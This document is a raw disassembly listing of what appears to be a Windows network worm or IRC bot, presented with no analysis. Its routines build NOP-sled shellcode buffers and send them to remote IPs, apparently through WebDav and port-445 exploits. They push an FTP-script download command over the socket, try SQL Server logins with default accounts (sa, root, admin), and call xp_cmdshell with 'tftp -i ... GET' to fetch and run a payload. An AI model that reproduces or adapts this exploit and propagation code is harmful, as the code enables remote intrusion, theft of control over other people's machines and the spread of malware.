mov word_42B690, ax
mov eax, 90909090h
jz loc_411D3D
mov ecx, 36Bh
lea edi, [ebp+var_EAC]
rep stosd
mov eax, [ebp+arg_144]
imul eax, 3Ch
mov edx, dword_42BDE0[eax]
mov eax, offset loc_42B5E0
mov ecx, eax
mov [ebp+var_6C8], edx
lea esi, [ecx+1]
loc_411C93: ; CODE XREF: sub_411B71+127�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_411C93
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp+var_6B8]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov [ebp+var_394], 6EB06EBh
mov [ebp+var_390], edx
lea esi, [ecx+1]
loc_411CC7: ; CODE XREF: sub_411B71+15B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_411CC7
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_384]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_411CE8: ; CODE XREF: sub_411B71+193�j
mov cl, [ebp+eax+var_EAC]
and [ebp+eax*2+var_402B], 0
mov [ebp+eax*2+var_402C], cl
inc eax
cmp eax, 0DACh
jl short loc_411CE8
and [ebp+var_24D4], 0
and [ebp+var_24D3], 0
mov edx, 714h
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_81DC]
rep stosd
stosw
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_6104]
rep stosd
stosw
jmp short loc_411DA4
; ---------------------------------------------------------------------------
loc_411D3D: ; CODE XREF: sub_411B71+F0�j
mov ecx, 1F4h
lea edi, [ebp+var_8D0]
rep stosd
mov eax, offset loc_42B5E0
mov ecx, eax
lea esi, [ecx+1]
loc_411D54: ; CODE XREF: sub_411B71+1E8�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_411D54
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_830]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C]
rep movsb
lea ecx, [eax+1]
loc_411D79: ; CODE XREF: sub_411B71+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411D79
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp+var_C]
lea edi, [ebp+var_114]
rep movsd
mov ecx, eax
mov eax, dword_42BDE0
and ecx, 3
rep movsb
mov [ebp+var_124], eax
loc_411DA4: ; CODE XREF: sub_411B71+1CA�j
mov esi, [ebp+arg_140]
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp+var_24D0]
rep stosd
stosb
movsx eax, [ebp+var_1]
push 0
add eax, 4
push eax
lea eax, [ebp+var_AC]
push eax
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_411DE1
loc_411DDA: ; CODE XREF: sub_411B71+29A�j
; sub_411B71+2C1�j ...
xor al, al
jmp loc_411F79
; ---------------------------------------------------------------------------
loc_411DE1: ; CODE XREF: sub_411B71+267�j
push 0
mov ebx, 640h
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_433414 ; recv
xor edi, edi
push edi
push 68h
push offset dword_42BA00
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_411DDA
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_433414 ; recv
push edi
push 0A0h
push offset dword_42BA70
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_411DDA
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_433414 ; recv
cmp [ebp+arg_144], edi
jz loc_411EF1
push 1Ah
pop ecx
mov esi, offset dword_42BC30
lea edi, [ebp+var_81DC]
rep movsd
mov ecx, 6D6h
lea esi, [ebp+var_402C]
lea edi, [ebp+var_8174]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42BCA0
lea edi, [ebp+var_6104]
rep movsd
mov ecx, 297h
lea esi, [ebp+var_2F98]
lea edi, [ebp+var_6094]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42BD18
lea edi, [ebp+var_55D0]
rep movsd
xor esi, esi
push esi
push 10FCh
lea eax, [ebp+var_81DC]
push eax
push [ebp+arg_140]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_411DDA
push esi
push ebx
lea eax, [ebp+var_14EC]
push eax
push [ebp+arg_140]
call dword_433414 ; recv
push esi
push 0FDCh
lea eax, [ebp+var_6104]
jmp short loc_411F38
; ---------------------------------------------------------------------------
loc_411EF1: ; CODE XREF: sub_411B71+2D9�j
push 1Fh
pop ecx
mov esi, offset dword_42BB18
lea edi, [ebp+var_24D0]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp+var_8D0]
lea edi, [ebp+var_2454]
rep movsd
pop ecx
mov esi, offset off_42BB98
lea edi, [ebp+var_1C84]
push 0
rep movsd
and [ebp+var_17D9], 0
push 0CF8h
lea eax, [ebp+var_24D0]
loc_411F38: ; CODE XREF: sub_411B71+37E�j
push eax
push [ebp+arg_140]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_411DDA
push 12Ch
call ds:dword_41F000 ; Sleep
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_411A2E
add esp, 140h
test al, al
setnz al
loc_411F79: ; CODE XREF: sub_411B71+26B�j
pop edi
pop esi
pop ebx
leave
retn
sub_411B71 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp-14h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
xor esi, esi
push eax
mov [ebp-4], esi
mov word ptr [ebp-14h], 2
call dword_433514 ; inet_addr
push dword ptr [ebp+12Ch]
mov [ebp-10h], eax
call dword_4335EC ; ntohs
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4334A0 ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jz loc_41207A
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_433458 ; connect
cmp eax, edi
jz loc_412073
push esi
push 89h
push offset dword_42B778
push ebx
call dword_433534 ; send
cmp eax, edi
jz short loc_412073
push esi
mov esi, 640h
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_433414 ; recv
push 0
push 0A8h
push offset dword_42B808
push ebx
call dword_433534 ; send
cmp eax, edi
jz short loc_412073
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_433414 ; recv
push 0
push 0DEh
push offset dword_42B8B8
push ebx
call dword_433534 ; send
cmp eax, edi
jz short loc_412073
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_433414 ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_412085
dec eax
jz short loc_412081
loc_412073: ; CODE XREF: .text:00411FE3�j
; .text:00411FFD�j ...
push ebx
call dword_4335AC ; closesocket
loc_41207A: ; CODE XREF: .text:00411FCE�j
xor eax, eax
jmp loc_412147
; ---------------------------------------------------------------------------
loc_412081: ; CODE XREF: .text:00412071�j
push 0
jmp short loc_4120A9
; ---------------------------------------------------------------------------
loc_412085: ; CODE XREF: .text:0041206E�j
push 2
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_411B71
add esp, 148h
test al, al
jnz short loc_4120C9
push 1
loc_4120A9: ; CODE XREF: .text:00412083�j
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_411B71
add esp, 148h
test al, al
jz short loc_4120D0
loc_4120C9: ; CODE XREF: .text:004120A5�j
mov dword ptr [ebp-4], 1
loc_4120D0: ; CODE XREF: .text:004120C7�j
push ebx
call dword_4335AC ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_412144
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_412E0D
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-214h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
lea eax, [ebp-214h]
push eax
call sub_401C33
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42A070[eax]
add esp, 2Ch
inc dword ptr [eax]
loc_412144: ; CODE XREF: .text:004120DB�j
xor eax, eax
inc eax
loc_412147: ; CODE XREF: .text:0041207C�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8590h
call sub_412DD0
mov eax, ds:dword_4275EC
push ebx
push esi
mov [ebp-0Ch], eax
mov eax, ds:dword_4275F0
push edi
mov [ebp-8], eax
lea eax, [ebp+0Ch]
push 1
push eax
call sub_4028A8
test eax, eax
pop ecx
pop ecx
jz loc_412737
cmp eax, 1
jz loc_412737
cmp eax, 3
jnz short loc_412195
and dword ptr [ebp-10h], 0
jmp short loc_4121A9
; ---------------------------------------------------------------------------
loc_412195: ; CODE XREF: .text:0041218D�j
call sub_412D71
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-10h], edx
loc_4121A9: ; CODE XREF: .text:00412193�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-58h]
push 28h
push eax
call sub_412E0D
add esp, 10h
xor eax, eax
loc_4121C2: ; CODE XREF: .text:004121D9�j
mov cl, [ebp+eax-58h]
and byte ptr [ebp+eax*2-11Fh], 0
mov [ebp+eax*2-120h], cl
inc eax
cmp eax, 28h
jl short loc_4121C2
push 18h
pop ecx
mov esi, offset dword_42C250
lea edi, [ebp-0D0h]
lea eax, [ebp-58h]
rep movsd
lea edx, [eax+1]
loc_4121F1: ; CODE XREF: .text:004121F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4121F1
sub eax, edx
mov ecx, eax
lea esi, [ebp-120h]
lea edi, [ebp-0A0h]
lea eax, [ebp-58h]
rep movsw
lea ecx, [eax+1]
loc_412211: ; CODE XREF: .text:00412216�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412211
sub eax, ecx
lea edi, [ebp+eax*2-0A1h]
mov esi, (offset aC_5+3)
movsd
movsd
lea eax, [ebp-58h]
movsb
lea ecx, [eax+1]
loc_41222F: ; CODE XREF: .text:00412234�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41222F
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp-1], al
mov [ebp-0CDh], al
lea eax, [ebp-58h]
lea ecx, [eax+1]
loc_41224B: ; CODE XREF: .text:00412250�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41224B
sub eax, ecx
shl al, 1
add al, 9
push 135h
mov [ebp-0A3h], al
call dword_4335EC ; ntohs
mov ebx, [ebp-10h]
xor eax, 9999h
cmp ebx, 1
mov word_42BF48, ax
jz short loc_4122F6
cmp ebx, 2
jz short loc_4122F6
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [ebp-12C4h]
rep stosd
mov eax, offset loc_42BE98
mov ecx, eax
lea esi, [ecx+1]
loc_41229D: ; CODE XREF: .text:004122A2�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_41229D
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-1224h]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-0Ch]
rep movsb
lea ecx, [eax+1]
loc_4122C2: ; CODE XREF: .text:004122C7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4122C2
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp-0Ch]
lea edi, [ebp-0B08h]
rep movsd
mov ecx, eax
and ecx, 3
imul ebx, 3Ch
mov eax, dword_42C690[ebx]
rep movsb
mov [ebp-0B18h], eax
jmp loc_4123C8
; ---------------------------------------------------------------------------
loc_4122F6: ; CODE XREF: .text:0041227A�j
; .text:0041227F�j
imul ebx, 3Ch
mov edx, dword_42C690[ebx]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [ebp-18A0h]
rep stosd
mov eax, offset loc_42BE98
mov ecx, eax
mov [ebp-10BCh], edx
lea esi, [ecx+1]
loc_412321: ; CODE XREF: .text:00412326�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_412321
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp-10ACh]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov dword ptr [ebp-0D88h], 6EB06EBh
mov [ebp-0D84h], edx
lea esi, [ecx+1]
loc_412355: ; CODE XREF: .text:0041235A�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_412355
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-0D78h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_412376: ; CODE XREF: .text:00412392�j
mov cl, [ebp+eax-18A0h]
and byte ptr [ebp+eax*2-43DFh], 0
mov [ebp+eax*2-43E0h], cl
inc eax
cmp eax, 0DACh
jl short loc_412376
and byte ptr [ebp-2888h], 0
and byte ptr [ebp-2887h], 0
mov edx, 714h
mov esi, 31313131h
mov ecx, edx
mov eax, esi
lea edi, [ebp-8590h]
rep stosd
stosw
mov ecx, edx
mov eax, esi
lea edi, [ebp-64B8h]
rep stosd
stosw
loc_4123C8: ; CODE XREF: .text:004122F1�j
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp-2884h]
rep stosd
xor ebx, ebx
push ebx
push 1
push 2
stosb
call dword_4334A0 ; socket
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jz loc_412739
push dword ptr [ebp+12Ch]
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-30h], 2
call dword_4335EC ; ntohs
mov [ebp-2Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_433514 ; inet_addr
mov [ebp-2Ch], eax
push 10h
lea eax, [ebp-30h]
push eax
push esi
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jz loc_412730
push ebx
push 89h
push offset dword_42C030
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push ebx
mov ebx, 640h
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
xor edi, edi
push edi
push 0A8h
push offset dword_42C0C0
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
push edi
push 0DEh
push offset dword_42C170
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
movsx eax, byte ptr [ebp-1]
push edi
add eax, 4
push eax
lea eax, [ebp-0D0h]
push eax
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
push edi
push 68h
push offset dword_42C2B8
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
push edi
push 0A0h
push offset dword_42C328
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
cmp dword ptr [ebp-10h], 1
jz short loc_4125B1
cmp dword ptr [ebp-10h], 2
jz short loc_4125B1
push 1Fh
pop ecx
mov esi, offset dword_42C3D0
lea edi, [ebp-2884h]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp-12C4h]
lea edi, [ebp-2808h]
rep movsd
pop ecx
push 0
push 0CF8h
lea eax, [ebp-2884h]
mov esi, offset off_42C450
lea edi, [ebp-2038h]
push eax
push dword ptr [ebp-8]
rep movsd
and byte ptr [ebp-1B8Dh], 0
loc_41259A: ; CODE XREF: .text:0041264B�j
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jnz loc_412650
loc_4125A9: ; CODE XREF: .text:00412674�j
push dword ptr [ebp-8]
jmp loc_412731
; ---------------------------------------------------------------------------
loc_4125B1: ; CODE XREF: .text:00412547�j
; .text:0041254D�j
push 1Ah
pop ecx
mov esi, offset dword_42C4E8
lea edi, [ebp-8590h]
rep movsd
mov ecx, 6D6h
lea esi, [ebp-43E0h]
lea edi, [ebp-8528h]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42C558
lea edi, [ebp-64B8h]
rep movsd
mov ecx, 297h
lea esi, [ebp-334Ch]
lea edi, [ebp-6448h]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42C5D0
lea edi, [ebp-5984h]
rep movsd
mov esi, [ebp-8]
xor edi, edi
push edi
push 10FCh
lea eax, [ebp-8590h]
push eax
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
push edi
push 0FDCh
lea eax, [ebp-64B8h]
push eax
push esi
jmp loc_41259A
; ---------------------------------------------------------------------------
loc_412650: ; CODE XREF: .text:004125A3�j
push 0
push ebx
lea eax, [ebp-0AF0h]
push eax
push dword ptr [ebp-8]
call dword_433414 ; recv
push 6
push 1
push 2
call dword_4334A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_4125A9
xor eax, eax
lea edi, [ebp-20h]
stosd
stosd
stosd
stosd
push 135h
mov word ptr [ebp-20h], 2
call dword_4335EC ; ntohs
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_433514 ; inet_addr
mov [ebp-1Ch], eax
push 10h
lea eax, [ebp-20h]
push eax
push esi
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4126BC
push dword ptr [ebp-8]
jmp short loc_41272A
; ---------------------------------------------------------------------------
loc_4126BC: ; CODE XREF: .text:004126B5�j
xor edi, edi
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414 ; recv
test eax, eax
jle short loc_412737
push 1F4h
call ds:dword_41F000 ; Sleep
push dword ptr [ebp+9Ch]
lea eax, [ebp+1Ch]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
lea eax, [ebp-2B0h]
push 190h
push eax
call sub_412E0D
lea eax, [ebp-2B0h]
add esp, 14h
lea edx, [eax+1]
loc_412709: ; CODE XREF: .text:0041270E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412709
push edi
sub eax, edx
push eax
lea eax, [ebp-2B0h]
push eax
push esi
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_41273E
loc_41272A: ; CODE XREF: .text:004126BA�j
call dword_4335AC ; closesocket
loc_412730: ; CODE XREF: .text:00412432�j
; .text:0041244D�j ...
push esi
loc_412731: ; CODE XREF: .text:004125AC�j
call dword_4335AC ; closesocket
loc_412737: ; CODE XREF: .text:0041217B�j
; .text:00412184�j ...
xor eax, eax
loc_412739: ; CODE XREF: .text:004123F2�j
; .text:004127C0�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41273E: ; CODE XREF: .text:00412728�j
call dword_4335AC ; closesocket
push esi
call dword_4335AC ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSTryingToXploi ; "[%s]: Trying to Xploit IP: %s."
lea eax, [ebp-4B0h]
push 200h
push eax
call sub_412E0D
add esp, 14h
cmp [ebp+140h], edi
jnz short loc_41279F
push edi
push dword ptr [ebp+13Ch]
lea eax, [ebp-4B0h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
add esp, 14h
loc_41279F: ; CODE XREF: .text:0041277D�j
lea eax, [ebp-4B0h]
push eax
call sub_401C33
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42A070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp loc_412739
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0E30h
push ebx
xor ebx, ebx
lea eax, [ebp-14h]
push eax
push ebx
push 1
mov [ebp-1], bl
mov dword ptr [ebp-30h], offset aSa ; "sa"
mov dword ptr [ebp-2Ch], offset aRoot ; "root"
mov dword ptr [ebp-28h], offset aAdmin ; "admin"
mov [ebp-24h], ebx
mov [ebp-1Ch], ebx
mov [ebp-0Ch], ebx
mov [ebp-10h], ebx
call dword_4334C4
test ax, ax
jnz short loc_41281E
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-14h]
call dword_43345C
test ax, ax
jz short loc_412825
loc_41281E: ; CODE XREF: .text:00412805�j
xor eax, eax
jmp loc_412A73
; ---------------------------------------------------------------------------
loc_412825: ; CODE XREF: .text:0041281C�j
push esi
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-14h]
push 2
call dword_4334C4
test ax, ax
jz short loc_412841
xor esi, esi
jmp loc_412A65
; ---------------------------------------------------------------------------
loc_412841: ; CODE XREF: .text:00412838�j
lea eax, [ebp-30h]
push edi
mov edi, ds:dword_41F000
mov [ebp-8], eax
loc_41284E: ; CODE XREF: .text:00412A53�j
cmp dword_42B050, ebx
mov [ebp-18h], ebx
jz loc_412A42
mov eax, offset dword_42B050
mov esi, eax
loc_412864: ; CODE XREF: .text:004128DE�j
lea ecx, [ebp-1]
push ecx
push dword ptr [eax]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
push eax
lea eax, [ebp-0A30h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_412BB5
lea eax, [ebp-0A30h]
add esp, 1Ch
lea ecx, [eax+1]
loc_412896: ; CODE XREF: .text:0041289B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_412896
push ebx
sub eax, ecx
lea ecx, [ebp-20h]
push ecx
push 400h
lea ecx, [ebp-0E30h]
push ecx
push eax
lea eax, [ebp-0A30h]
push eax
push ebx
push dword ptr [ebp-0Ch]
call dword_43358C
cmp ax, bx
jz short loc_4128E5
cmp ax, 1
jz short loc_4128E5
push 1F4h
call edi ; Sleep
inc dword ptr [ebp-18h]
add esi, 4
cmp [esi], ebx
mov eax, esi
jnz short loc_412864
jmp loc_412A42
; ---------------------------------------------------------------------------
loc_4128E5: ; CODE XREF: .text:004128C5�j
; .text:004128CB�j
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-0Ch]
push 3
call dword_4334C4
mov esi, offset byte_42AED0
push esi
push dword ptr [ebp+8]
call sub_406C33
pop ecx
push eax
lea eax, [ebp-630h]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_412BB5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_4335A4
test ax, ax
jz loc_412A2E
push 1388h
call edi ; Sleep
push esi
lea eax, [ebp-630h]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell '%s'"
push eax
call sub_412BB5
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-230h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_412BB5
add esp, 18h
xor esi, esi
loc_412966: ; CODE XREF: .text:00412999�j
lea eax, [ebp-230h]
push eax
call sub_401D13
test eax, eax
pop ecx
jz short loc_41298E
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_4335A4
test ax, ax
jz short loc_4129A0
loc_41298E: ; CODE XREF: .text:00412975�j
push 1388h
call edi ; Sleep
inc esi
cmp esi, 6
jl short loc_412966
jmp loc_412A2E
; ---------------------------------------------------------------------------
loc_4129A0: ; CODE XREF: .text:0041298C�j
mov eax, [ebp-18h]
push dword_42B050[eax*4]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
mov dword ptr [ebp-1Ch], 1
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: (%s:%d) User: (%s/"...
lea eax, [ebp-230h]
push 200h
push eax
call sub_412E0D
add esp, 20h
cmp [ebp+140h], ebx
jnz short loc_412A10
push ebx
push dword ptr [ebp+13Ch]
lea eax, [ebp-230h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
add esp, 14h
loc_412A10: ; CODE XREF: .text:004129EE�j
lea eax, [ebp-230h]
push eax
call sub_401C33
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42A070[eax]
inc dword ptr [eax]
pop ecx
loc_412A2E: ; CODE XREF: .text:0041292D�j
; .text:0041299B�j
push dword ptr [ebp-0Ch]
call dword_433468
push dword ptr [ebp-10h]
push 3
call dword_433550
loc_412A42: ; CODE XREF: .text:00412857�j
; .text:004128E0�j
mov esi, [ebp-1Ch]
cmp esi, 1
jz short loc_412A59
add dword ptr [ebp-8], 4
mov eax, [ebp-8]
cmp [eax], ebx
jnz loc_41284E
loc_412A59: ; CODE XREF: .text:00412A48�j
push dword ptr [ebp-0Ch]
push 2
call dword_433550
pop edi
loc_412A65: ; CODE XREF: .text:0041283C�j
push dword ptr [ebp-14h]
push 1
call dword_433550
mov eax, esi
pop esi
loc_412A73: ; CODE XREF: .text:00412820�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412A80 proc near ; CODE XREF: sub_401000+5C�p
; sub_401000+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_412B44
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_412AAC
loc_412A9B: ; CODE XREF: sub_412A80+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_412ADD
test edi, 3
jnz short loc_412A9B
loc_412AAC: ; CODE XREF: sub_412A80+19�j
; sub_412A80+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_412AAC
mov eax, [edi-4]
test al, al
jz short loc_412AEC
test ah, ah
jz short loc_412AE7
test eax, 0FF0000h
jz short loc_412AE2
test eax, 0FF000000h
jnz short loc_412AAC
loc_412ADD: ; CODE XREF: sub_412A80+22�j
sub edi, 1
jmp short loc_412AEF
; ---------------------------------------------------------------------------
loc_412AE2: ; CODE XREF: sub_412A80+54�j
sub edi, 2
jmp short loc_412AEF
; ---------------------------------------------------------------------------
loc_412AE7: ; CODE XREF: sub_412A80+4D�j
sub edi, 3
jmp short loc_412AEF
; ---------------------------------------------------------------------------
loc_412AEC: ; CODE XREF: sub_412A80+49�j
sub edi, 4
loc_412AEF: ; CODE XREF: sub_412A80+60�j
; sub_412A80+65�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_412B04
mov ebx, ecx
shr ecx, 2
jnz short loc_412B5E
jmp short loc_412B26
; ---------------------------------------------------------------------------
loc_412B04: ; CODE XREF: sub_412A80+79�j
; sub_412A80+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_412B4A
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_412B40
test esi, 3
jnz short loc_412B04
mov ebx, ecx
shr ecx, 2
jnz short loc_412B5E
loc_412B26: ; CODE XREF: sub_412A80+82�j
; sub_412A80+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_412B40
loc_412B2D: ; CODE XREF: sub_412A80+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_412B42
sub ecx, 1
jnz short loc_412B2D
loc_412B40: ; CODE XREF: sub_412A80+95�j
; sub_412A80+AB�j
mov [edi], cl
loc_412B42: ; CODE XREF: sub_412A80+B9�j
pop ebx
pop esi
loc_412B44: ; CODE XREF: sub_412A80+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_412B4A: ; CODE XREF: sub_412A80+8B�j
; sub_412A80+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412B54: ; CODE XREF: sub_412A80+F6�j
; sub_412A80+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_412B26
loc_412B5E: ; CODE XREF: sub_412A80+80�j
; sub_412A80+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_412B54
test dl, dl
jz short loc_412B4A
test dh, dh
jz short loc_412BAA
test edx, 0FF0000h
jz short loc_412B9A
test edx, 0FF000000h
jnz short loc_412B54
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
